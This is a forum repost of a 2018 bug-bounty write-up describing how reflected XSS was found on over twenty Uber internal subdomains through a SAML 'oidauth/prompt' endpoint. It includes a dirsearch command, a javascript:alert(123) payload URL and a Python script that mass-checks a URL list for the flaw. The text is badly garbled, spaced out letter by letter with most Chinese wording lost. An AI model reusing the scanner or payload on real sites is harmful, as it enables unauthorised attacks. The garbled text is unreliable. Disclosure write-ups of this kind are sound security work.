搜索

[13523] 2018-12-12_看我如何发现影响20多个Uber子域名的XSS漏洞

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-18
2018-12-12_看我如何发现影响20多个Uber子域名的XSS漏洞 2 0 U b e r X S S c l o u d s   F r e e B u f   2 0 1 8 - 1 2 - 1 2 2 0 U b e r X S S u b e r i n t e r n a l . c o m u b e r . o n e l o g i n . c o m U b e r $ 2 5 0 0 S A M L S e c u r i t y   A s s e r t i o n   M a r k u p   L a n g u a g e S A M L X M L S A M L I d P S P S A M L 使 访 S A M L S A M L S A M L S A M L
U b e r u b e r i n t e r n a l . c o m a q u a t o n e u b e r i n t e r n a l . c o m u b e r . o n e l o g i n . c o m o n e l o g i n 使 S A M L U b e r S A M L U b e r 1 2 S A M L U c h a t u b e r i n t e r n a l . c o m S A M L S A M L u b e r . o n e l o g i n . c o m u b e r i n t e r n a l . c o m u b e r . o n e l o g i n . c o m u b e r . o n e l o g i n . c o m u b e r i n t e r n a l . c o m u b e r . o n e l o g i n . c o m b a s e 6 4 S A M L R e q u e s t b a s e 6 4 s a m l t o o l 线 S A M L   D e c o d e r u b e r . o n e l o g i n . c o m   S A M L   c o n s u m e   U R L h t t p s : / / c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m : 4 4 3 / o i d a u t h / s a m l _ c o n s u m e
S A M L B u r p S u i t e S A M L S A M L   S A M L E x t r a c t o r S A M L   c o n s u m e   U R L S A M L   c o n s u m e   U R L S A M L d i r s e a r c h o i d a u t h . / d i r s e a r c h . p y   - u   h t t p s : / / c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m : 4 4 3 / o i d a u t h /   - e j s o n o i d a u t h h t t p s : / / c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m : 4 4 3 / o i d a u t h / l o g o u t 退 w e b 退 X S S h t t p s : / / c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m / o i d a u t h / p r o m p t ? b a s e = h t t p s % 3 A % 2 F % 2 F c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m % 3 A 4 4 3 % 2 F o i d a u t h & r e t u r n t o = % 2 F % 3 F o p e n i d c % 3 D 1 5 4 2 1 5 6 7 6 6 . 5 % 2 F S n N Q g % 3 D % 3 D & s p l a s h _ d i s a b l e d = 1 U R L h t t p s : / / c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m / o i d a u t h / p r o m p t ? b a s e = h t t p s : / / c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m : 4 4 3 / o i d a u t h & r e t u r n t o = / ? o p e n i d c = 1 5 4 2 1 5 6 7 6 6 . 5 / S n N Q g = = & s p l a s h _ d i s a b l e d = 1 b a s e U R L c a r b o n - p r o t o t y p e . u b e r i n t e r n a l . c o m : 4 4 3 j a v a s c r i p t : a l e r t ( 1 2 3 )   X S S C l i c k j a c k i n g X S S C l i c k j a c k i n g 便 S A M L E x t r a c t o r S A M L   c o n s u m e   U R L u b e r i n t e r n a l . c o m X S S o i d a u t h / p r o m p t   j a v a s c r i p t : a l e r t ( 1 2 3 )   X S S X S S j a v a s c r i p t : a l e r t ( 1 2 3 ) i m p o r t   r e q u e s t s i m p o r t   u r l l i b 3 u r l l i b 3 . d i s a b l e _ w a r n i n g s ( u r l l i b 3 . e x c e p t i o n s . I n s e c u r e R e q u e s t W a r n i n g ) f r o m   c o l o r a m a   i m p o r t   i n i t   , F o r e ,   B a c k ,   S t y l e i n i t ( ) w i t h   o p e n ( " / h o m e / f a d y / u b e r S A M L O I D A U T H " )   a s   u r l L i s t :                         f o r   u r l   i n   u r l L i s t :                                 u r l 2   =   u r l . s t r i p ( ) . s p l i t ( " o i d a u t h " ) [ 0 ]   +   " o i d a u t h / p r o m p t ? b a s e = j a v a s c r i p t % 3 A a l e r t ( 1 2 3 ) % 3 B % 2 F % 2 F F a d y & r e t u r n _ t o = % 2 F % 3 F o p e n i d _ c % 3 D 1 5 2 0 7 5 8 5 8 5 . 4 2 S t P D w Q % 3 D % 3 D & s p l a s h _ d i s a b l e d = 1 "                                 r e q u e s t   =   r e q u e s t s . g e t ( u r l 2 ,   a l l o w _ r e d i r e c t s = T r u e , v e r i f y = F a l s e )                                 d o e s i t   =   F o r e . R E D   +   " n o "                                 i f   ( " F a d y "   i n   r e q u e s t . c o n t e n t ) :                                         d o e s i t   =   F o r e . G R E E N   +   " y e s "                                 p r i n t ( F o r e . W H I T E   +   u r l 2 )                                 p r i n t ( F o r e . W H I T E   +   " L e n   :   "   +   s t r ( l e n ( r e q u e s t . c o n t e n t ) )   +   "       V u l n e r a b l e   :   "   +   d o e s i t )
h t t p s : / / e n g . u b e r i n t e r n a l . c o m X S S u b e r i n t e r n a l . c o m 2 0 X S S U b e r $ 5 0 0 $ 2 0 0 0 -   r e p o r t   1   /   r e p o r t   2 f a d y c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理